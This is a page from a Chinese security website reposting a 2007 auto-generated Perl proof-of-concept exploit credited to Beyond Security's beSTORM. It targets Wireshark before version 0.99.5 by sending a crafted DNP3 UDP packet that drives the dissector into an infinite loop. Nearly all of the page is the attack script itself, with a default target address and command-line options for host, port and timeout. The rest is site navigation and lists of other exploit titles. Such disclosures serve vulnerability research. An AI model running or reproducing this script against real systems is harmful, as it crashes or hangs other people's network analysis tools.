首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛

当前位置：主页>安全文章>文章资料>Exploits>文章内容 Wireshark < 0.99.5 DNP3 Dissector Infinite Loop Exploit 来源：Beyond Security 作者：beSTORM 发布时间：2007-09-03   #!/usr/bin/perl # Automatically generated by beSTORM(tm) # Copyright Beyond Security (c) 2003-2007 ($Revision: 3741 $) # Attack vector: # M0:P0:B0.BT0:B0.BT0:B0.BT0:B0.BT0 # Module: #  DNP3 use strict; use warnings; use Getopt::Std; use IO::Socket::INET; $SIG{INT}  = \&abort; my $host  = '192.168.4.52'; my $port  = 20000; my $proto = 'udp'; my $sockType = SOCK_DGRAM; my $timeout = 1; #Read command line arguments my %opt; my $opt_string = 'hH:P:t:'; getopts( "$opt_string", \%opt ); if (defined $opt{h}) {     usage() } $host    = $opt{H} ? $opt{H} : $host; $port    = $opt{P} ? $opt{P} : $port; $timeout = $opt{t} ? $opt{t} : $timeout; my @commands = ( {Command => 'Send', Data => "\xC3\xC0\x01\x01\x00\x01\x07\x08\x01\x02\x03\x04\x05\x06\x07\x08}, {Command => 'Receive'}, ); ### # End user configurable part ### #1. Create a new connection my $sock = new IO::Socket::INET (                 PeerAddr => $host,     PeerPort => $port,     Proto => $proto,                 Type => $sockType,                 Timeout => $timeout,             )     or die "socket error: $!\n\n"; print "connected to: $host:$port\n"; $sock->autoflush(1); binmode $sock; #2. communication part foreach my $command (@commands) {     if ($command->{'Command'} eq 'Receive')     {         my $buf = receive($sock, $timeout);         if (length $buf)         {             print "received: [$buf]\n";         }     }     elsif ($command->{'Command'} eq 'Send')     {         print "sending: [".$command->{'Data'}."]\n";         send ($sock, $command->{'Data'}, 0) or die "send failed, reason: $!\n";     } } #3. Close connection close ($sock); #The end sub receive { my $sock = shift; my $timeout = shift; my $tmpbuf; my $buf = ""; while(1) { # Example from perldoc -f alarm   eval {     local $SIG{ALRM} = sub { die "timeout\n" };     alarm $timeout;     my $ret = read $sock, $tmpbuf, 1; #We read data one byte at a time.     if ( !defined $ret or $ret == 0 )     { #EOF         die "timeout\n";     }     alarm 0;     $buf .= $tmpbuf;   };   if ($@) { #time out     if($@ eq "timeout\n")     {         last;     }     else {         die "receive aborted\n";     }   } } #while return $buf; } sub abort {     print "aborting...\n";     if ($sock)     {         close $sock;     }     die "User aborted operation\n"; } sub usage { print "usage: $0 [-hHPt]\n"; print "-h\t: this help message\n"; print "-H\t: override default host - $host\n"; print "-P\t: override default port - $port\n"; print "-t\t: set socket timeout in seconds\n"; exit 0; }   [推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]   匿名评论 评论内容：(不能超过250字，需审核后才会公布，请自觉遵守互联网相关政策法规。  §最新评论：

热点文章 ·CVE-2012-0217 Intel sysret exp ·Linux Kernel 2.6.32 Local Root ·Array Networks vxAG / xAPV Pri ·Novell NetIQ Privileged User M ·Array Networks vAPV / vxAG Cod ·Excel SLYK Format Parsing Buff ·PhpInclude.Worm - PHP Scripts ·Apache 2.2.0 - 2.2.11 Remote e ·VideoScript 3.0 <= 4.0.1.50 Of ·Yahoo! Messenger Webcam 8.1 Ac ·Family Connections <= 1.8.2 Re ·Joomla Component EasyBook 1.1   相关文章 ·phpBB Links MOD 1.2.2 Remote S ·PPStream (PowerPlayer.dll 2.0. ·Norman Virus Control nvcoaft51 ·CKGold Shopping Cart 2.0 (cate ·Hexamail Server 3.0.0.001 (pop ·Joomla! 1.5 Beta1/Beta2/RC1 Re ·Pakupaku CMS <= 0.4 Remote Fil ·Yahoo! Messenger (YVerInfo.dll ·ABC estore 3.0 (cat_id) Blind ·OTSTurntables 1.00 (m3u File) ·MS Windows (GDI32.DLL) Denial ·Apple Quicktime < 7.2 SMIL Rem   推荐广告

CopyRight © 2002-2022 VFocuS.Net All Rights Reserved